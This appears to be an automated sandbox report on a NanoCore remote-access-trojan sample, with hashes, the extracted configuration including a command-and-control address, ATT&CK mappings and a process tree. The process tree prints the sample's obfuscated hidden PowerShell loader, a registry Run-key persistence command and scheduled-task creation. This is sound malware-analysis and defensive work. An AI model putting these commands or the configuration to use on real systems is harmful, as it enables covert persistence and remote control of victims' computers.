nanocore | 01084cac1b32ed96f39659685faaf1f37cfaee0d204a361c3759c3ff0aa38389

General

Target

2b0539ba691f98b1c255d082d7589570_NeikiAnalytics.exe
Size

383KB
MD5

2b0539ba691f98b1c255d082d7589570
SHA1

f228a998f9a2c0b1979e92f416603341d16ea86b
SHA256

01084cac1b32ed96f39659685faaf1f37cfaee0d204a361c3759c3ff0aa38389
SHA512

72965d8434a758a544b2868d26fb7b4ec708c285d0effd199c560393d703e7ce163757a67237ec61433498d6b883228388c8669e0c5e92dee4bfea0aded71617
SSDEEP

6144:7auq7YTzYh5LofcnWgHMMPl410Ngz7NlaUnQWNquQ0op6wRIIZZ2Mog:gYE5UfGWgVPl4aNgzBoUnQYiEIZvD

Score

10^/10

nanocore execution keylogger persistence spyware stealer trojan

Malware Config

Extracted

Family

nanocore

Version

1.2.2.0

C2

184.75.223.235:4532

Mutex

2a3b374a-79d4-414e-b18c-11618e6c445b

Attributes

activate_away_mode
true
backup_connection_host
backup_dns_server
8.8.4.4
buffer_size
65535
build_time
2024-02-23T12:22:51.547079836Z
bypass_user_account_control
false
bypass_user_account_control_data
PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTE2Ij8+DQo8VGFzayB2ZXJzaW9uPSIxLjIiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmRvd3MvMjAwNC8wMi9taXQvdGFzayI+DQogIDxSZWdpc3RyYXRpb25JbmZvIC8+DQogIDxUcmlnZ2VycyAvPg0KICA8UHJpbmNpcGFscz4NCiAgICA8UHJpbmNpcGFsIGlkPSJBdXRob3IiPg0KICAgICAgPExvZ29uVHlwZT5JbnRlcmFjdGl2ZVRva2VuPC9Mb2dvblR5cGU+DQogICAgICA8UnVuTGV2ZWw+SGlnaGVzdEF2YWlsYWJsZTwvUnVuTGV2ZWw+DQogICAgPC9QcmluY2lwYWw+DQogIDwvUHJpbmNpcGFscz4NCiAgPFNldHRpbmdzPg0KICAgIDxNdWx0aXBsZUluc3RhbmNlc1BvbGljeT5QYXJhbGxlbDwvTXVsdGlwbGVJbnN0YW5jZXNQb2xpY3k+DQogICAgPERpc2FsbG93U3RhcnRJZk9uQmF0dGVyaWVzPmZhbHNlPC9EaXNhbGxvd1N0YXJ0SWZPbkJhdHRlcmllcz4NCiAgICA8U3RvcElmR29pbmdPbkJhdHRlcmllcz5mYWxzZTwvU3RvcElmR29pbmdPbkJhdHRlcmllcz4NCiAgICA8QWxsb3dIYXJkVGVybWluYXRlPnRydWU8L0FsbG93SGFyZFRlcm1pbmF0ZT4NCiAgICA8U3RhcnRXaGVuQXZhaWxhYmxlPmZhbHNlPC9TdGFydFdoZW5BdmFpbGFibGU+DQogICAgPFJ1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+ZmFsc2U8L1J1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+DQogICAgPElkbGVTZXR0aW5ncz4NCiAgICAgIDxTdG9wT25JZGxlRW5kPmZhbHNlPC9TdG9wT25JZGxlRW5kPg0KICAgICAgPFJlc3RhcnRPbklkbGU+ZmFsc2U8L1Jlc3RhcnRPbklkbGU+DQogICAgPC9JZGxlU2V0dGluZ3M+DQogICAgPEFsbG93U3RhcnRPbkRlbWFuZD50cnVlPC9BbGxvd1N0YXJ0T25EZW1hbmQ+DQogICAgPEVuYWJsZWQ+dHJ1ZTwvRW5hYmxlZD4NCiAgICA8SGlkZGVuPmZhbHNlPC9IaWRkZW4+DQogICAgPFJ1bk9ubHlJZklkbGU+ZmFsc2U8L1J1bk9ubHlJZklkbGU+DQogICAgPFdha2VUb1J1bj5mYWxzZTwvV2FrZVRvUnVuPg0KICAgIDxFeGVjdXRpb25UaW1lTGltaXQ+UFQwUzwvRXhlY3V0aW9uVGltZUxpbWl0Pg0KICAgIDxQcmlvcml0eT40PC9Qcmlvcml0eT4NCiAgPC9TZXR0aW5ncz4NCiAgPEFjdGlvbnMgQ29udGV4dD0iQXV0aG9yIj4NCiAgICA8RXhlYz4NCiAgICAgIDxDb21tYW5kPiIjRVhFQ1VUQUJMRVBBVEgiPC9Db21tYW5kPg0KICAgICAgPEFyZ3VtZW50cz4kKEFyZzApPC9Bcmd1bWVudHM+DQogICAgPC9FeGVjPg0KICA8L0FjdGlvbnM+DQo8L1Rhc2s+
clear_access_control
true
clear_zone_identifier
false
connect_delay
4000
connection_port
4532
default_group
Default
enable_debug_mode
true
gc_threshold
1.048576e+07
keep_alive_timeout
30000
keyboard_logging
false
lan_timeout
2500
max_packet_size
1.048576e+07
mutex
2a3b374a-79d4-414e-b18c-11618e6c445b
mutex_timeout
5000
prevent_system_sleep
false
primary_connection_host
184.75.223.235
primary_dns_server
8.8.8.8
request_elevation
true
restart_delay
5000
run_delay
0
run_on_startup
false
set_critical_process
true
timeout_interval
5000
use_custom_dns_server
false
version
1.2.2.0
wan_timeout
8000

Signatures

NanoCore
NanoCore is a remote access tool (RAT) with a variety of capabilities.
keylogger trojan stealer spyware nanocore
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

1648 powershell.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exewab.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\Fremfrings = "%Taletiden% -windowstyle minimized $Typecasts=(Get-ItemProperty -Path 'HKCU:\\Crepidoma\\').Fozinesses;%Taletiden% ($Typecasts)"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\NTFS Monitor = "C:\\Program Files (x86)\\NTFS Monitor\\ntfsmon.exe"	wab.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

3 drive.google.com
5 drive.google.com
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

wab.exe

pid process

2068 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

1648 powershell.exe
2068 wab.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1648 set thread context of 2068 1648 powershell.exe wab.exe

flow	ioc
3	drive.google.com
5	drive.google.com

pid	process
2068	wab.exe

description	pid	process	target process
PID 1648 set thread context of 2068	1648	powershell.exe	wab.exe

Drops file in Program Files directory 2 IoCs

Processes:

wab.exe

description	ioc	process
File created	C:\Program Files (x86)\NTFS Monitor\ntfsmon.exe	wab.exe
File opened for modification	C:\Program Files (x86)\NTFS Monitor\ntfsmon.exe	wab.exe

Drops file in Windows directory 3 IoCs

Processes:

2b0539ba691f98b1c255d082d7589570_NeikiAnalytics.exe

description	ioc	process
File opened for modification	C:\Windows\Vulnerabilities\Navettes131.ini	2b0539ba691f98b1c255d082d7589570_NeikiAnalytics.exe
File opened for modification	C:\Windows\resources\0409\sporeforming.bal	2b0539ba691f98b1c255d082d7589570_NeikiAnalytics.exe
File opened for modification	C:\Windows\resources\stereotypery.teu	2b0539ba691f98b1c255d082d7589570_NeikiAnalytics.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1100 schtasks.exe
2296 schtasks.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

768 reg.exe

pid	process
1100	schtasks.exe
2296	schtasks.exe

pid	process
768	reg.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exe

pid	process
1648	powershell.exe
1648	powershell.exe
1648	powershell.exe
1648	powershell.exe
1648	powershell.exe
1648	powershell.exe
1648	powershell.exe
1648	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

1648 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1648 powershell.exe

description	pid	process
Token: SeDebugPrivilege	1648	powershell.exe

Suspicious use of WriteProcessMemory 30 IoCs

Processes:

2b0539ba691f98b1c255d082d7589570_NeikiAnalytics.exepowershell.exewab.execmd.exe

description	pid	process	target process
PID 2228 wrote to memory of 1648	2228	2b0539ba691f98b1c255d082d7589570_NeikiAnalytics.exe	powershell.exe
PID 2228 wrote to memory of 1648	2228	2b0539ba691f98b1c255d082d7589570_NeikiAnalytics.exe	powershell.exe
PID 2228 wrote to memory of 1648	2228	2b0539ba691f98b1c255d082d7589570_NeikiAnalytics.exe	powershell.exe
PID 2228 wrote to memory of 1648	2228	2b0539ba691f98b1c255d082d7589570_NeikiAnalytics.exe	powershell.exe
PID 1648 wrote to memory of 356	1648	powershell.exe	cmd.exe
PID 1648 wrote to memory of 356	1648	powershell.exe	cmd.exe
PID 1648 wrote to memory of 356	1648	powershell.exe	cmd.exe
PID 1648 wrote to memory of 356	1648	powershell.exe	cmd.exe
PID 1648 wrote to memory of 2068	1648	powershell.exe	wab.exe
PID 1648 wrote to memory of 2068	1648	powershell.exe	wab.exe
PID 1648 wrote to memory of 2068	1648	powershell.exe	wab.exe
PID 1648 wrote to memory of 2068	1648	powershell.exe	wab.exe
PID 1648 wrote to memory of 2068	1648	powershell.exe	wab.exe
PID 1648 wrote to memory of 2068	1648	powershell.exe	wab.exe
PID 2068 wrote to memory of 2152	2068	wab.exe	cmd.exe
PID 2068 wrote to memory of 2152	2068	wab.exe	cmd.exe
PID 2068 wrote to memory of 2152	2068	wab.exe	cmd.exe
PID 2068 wrote to memory of 2152	2068	wab.exe	cmd.exe
PID 2152 wrote to memory of 768	2152	cmd.exe	reg.exe
PID 2152 wrote to memory of 768	2152	cmd.exe	reg.exe
PID 2152 wrote to memory of 768	2152	cmd.exe	reg.exe
PID 2152 wrote to memory of 768	2152	cmd.exe	reg.exe
PID 2068 wrote to memory of 1100	2068	wab.exe	schtasks.exe
PID 2068 wrote to memory of 1100	2068	wab.exe	schtasks.exe
PID 2068 wrote to memory of 1100	2068	wab.exe	schtasks.exe
PID 2068 wrote to memory of 1100	2068	wab.exe	schtasks.exe
PID 2068 wrote to memory of 2296	2068	wab.exe	schtasks.exe
PID 2068 wrote to memory of 2296	2068	wab.exe	schtasks.exe
PID 2068 wrote to memory of 2296	2068	wab.exe	schtasks.exe
PID 2068 wrote to memory of 2296	2068	wab.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\2b0539ba691f98b1c255d082d7589570_NeikiAnalytics.exe
"C:\Users\Admin\AppData\Local\Temp\2b0539ba691f98b1c255d082d7589570_NeikiAnalytics.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2228

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -windowstyle hidden "$Afspadserede225=Get-Content 'C:\Users\Admin\AppData\Local\Temp\Mediatrices238\udkikstaarnene\deflationer\Elverhj\Forskrivende.Udr';$Novelettish=$Afspadserede225.SubString(53200,3);.$Novelettish($Afspadserede225)"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1648

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
3⤵
PID:356

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
3⤵
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2068

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Fremfrings" /t REG_EXPAND_SZ /d "%Taletiden% -windowstyle minimized $Typecasts=(Get-ItemProperty -Path 'HKCU:\Crepidoma\').Fozinesses;%Taletiden% ($Typecasts)"
4⤵
- Suspicious use of WriteProcessMemory
PID:2152

C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Fremfrings" /t REG_EXPAND_SZ /d "%Taletiden% -windowstyle minimized $Typecasts=(Get-ItemProperty -Path 'HKCU:\Crepidoma\').Fozinesses;%Taletiden% ($Typecasts)"
5⤵
- Adds Run key to start application
- Modifies registry key
PID:768

C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /create /f /tn "NTFS Monitor" /xml "C:\Users\Admin\AppData\Local\Temp\tmp99A3.tmp"
4⤵
- Creates scheduled task(s)
PID:1100

C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /create /f /tn "NTFS Monitor Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmp9A20.tmp"
4⤵
- Creates scheduled task(s)
PID:2296

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

Scheduled Task/Job

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

Scheduled Task/Job

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Mediatrices238\udkikstaarnene\deflationer\Elverhj\Forskrivende.Udr
Filesize
51KB

MD5
6b3ce49e30626debe4ebc638e79bfbc1

SHA1
f0941c7b2694735091249b1676e4ba7693e6ede9

SHA256
bebd427c3ece459de5fc091d4573f313ba55bf68bdad2dbaf9f8ec5637b4990e

SHA512
d1bd3fb17897cba3fa4e9bde3b7bc7b73c88edb72cb47bc439b866c45f77ae85d01c6d9941ebc574ef660c33395b804a441bf9cef370b0c5dedbd3a1ac604e5d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Mediatrices238\udkikstaarnene\deflationer\Milieugifts.Koa
Filesize
341KB

MD5
c1db703a47e0df7927aed1ab569b7ba7

SHA1
9b13decd58b8c434974ec24141b29e07ad008297

SHA256
7956dcaf28392b383184aec8e81c6c2f0b8d6c12fb889360c1a8f51a85912fb5

SHA512
b920cb5d9663eb3372a2c112b439dd83deb438d432b61bec63e697ae66d2131f169d18592e9e8c5213ee3f591bad8fa1b724915cd4f01d0d45c79070ae6d7977

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp99A3.tmp
Filesize
1KB

MD5
5ccc18c3f1852b87de26278cba055c13

SHA1
9233db8c004ac3e1b34c0782bac706a17bdc43ae

SHA256
7d588a9e361cccb0a3c97ec7ac99efe60e82932c64ab6efbfc929f51acb38432

SHA512
1ad0e9d090e93bdfa76c7ff60c5492c43265f53adf0ac23a7c831231e12822b11bae6d0840f92c8deddc9e08dbb383d24073ece791feaf36687692a437294ed7

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp9A20.tmp
Filesize
1KB

MD5
981e126601526eaa5b0ad45c496c4465

SHA1
d610d6a21a8420cc73fcd3e54ddae75a5897b28b

SHA256
11ae277dfa39e7038b782ca6557339e7fe88533fe83705c356a1500a1402d527

SHA512
a59fb704d931ccb7e1ec1a7b98e24ccd8708be529066c6de4b673098cdebef539f7f50d9e051c43954b5a8e7f810862b3a4ede170f131e080dadc3e763ed4bdb

Download Submit
memory/1648-11-0x0000000074200000-0x00000000747AB000-memory.dmp

Filesize
5.7MB

Download
memory/1648-10-0x0000000074200000-0x00000000747AB000-memory.dmp

Filesize
5.7MB

Download
memory/1648-9-0x0000000074201000-0x0000000074202000-memory.dmp

Filesize
4KB

Download
memory/1648-17-0x0000000006790000-0x000000000B171000-memory.dmp

Filesize
73.9MB

Download
memory/1648-18-0x0000000074200000-0x00000000747AB000-memory.dmp

Filesize
5.7MB

Download
memory/1648-12-0x0000000074200000-0x00000000747AB000-memory.dmp

Filesize
5.7MB

Download
memory/1648-13-0x0000000074200000-0x00000000747AB000-memory.dmp

Filesize
5.7MB

Download
memory/2068-19-0x0000000000660000-0x00000000016C2000-memory.dmp

Filesize
16.4MB

Download
memory/2068-42-0x0000000000660000-0x00000000016C2000-memory.dmp

Filesize
16.4MB

Download
memory/2068-44-0x0000000000660000-0x000000000069A000-memory.dmp

Filesize
232KB

Download
memory/2068-52-0x00000000215C0000-0x00000000215CA000-memory.dmp

Filesize
40KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads